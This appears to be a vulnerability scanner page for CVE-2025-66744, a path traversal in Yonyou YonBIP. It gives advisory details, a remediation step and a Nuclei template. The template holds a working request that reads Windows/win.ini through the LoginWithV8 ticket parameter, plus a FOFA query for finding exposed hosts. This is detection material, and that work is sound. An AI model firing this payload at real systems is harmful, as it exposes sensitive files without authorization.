Yonyou YonBIP - Path Traversal
CVE-2025-66744
Verified
Description
Yonyou YonBIP v3 and before contains a path traversal caused by improper validation in the LoginWithV8 interface of the series data application service system, letting unauthorized attackers access sensitive information.
Severity
High
CVSS Score
7.5
Exploit Probability
1%
Published Date
February 10, 2026
Template Author
dhiyaneshdk
CVE-2025-66744.yaml
id: CVE-2025-66744
info:
name: Yonyou YonBIP - Path Traversal
author: DhiyaneshDk
severity: high
description: |
Yonyou YonBIP v3 and before contains a path traversal caused by improper validation in the LoginWithV8 interface of the series data application service system, letting unauthorized attackers access sensitive information.
impact: |
Unauthorized attackers can access sensitive system information, potentially leading to data exposure.
remediation: |
Update to the latest version beyond v3.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-66744
- https://github.com/iSee857/YonYouBip-path-travel
classification:
cve-id: CVE-2025-66744
epss-score: 0.01446
epss-percentile: 0.70082
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
metadata:
max-request: 1
verified: true
fofa-query: body="YonBIP | 数据应用服务"
tags: cve,cve2025,yonbip,lfi,vkev
http:
- raw:
- |
GET /bi/api/Portal/LoginWithV8/?ticket=/../../../../Windows/win.ini HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: word
part: body
words:
- "[fonts]"
- "[extensions]"
- "Message"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100b18f0d76288f6f56d24a38c1af349e896dfb993bae854d035dccdcb9e3010158022100e09103822cc685c77ea32797d053f562092591c6418ae7b8394c8114c5712de0:922c64590222798bb761d5b6d8e729507.5Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2025-66744
Remediation Steps
Update to the latest version beyond v3.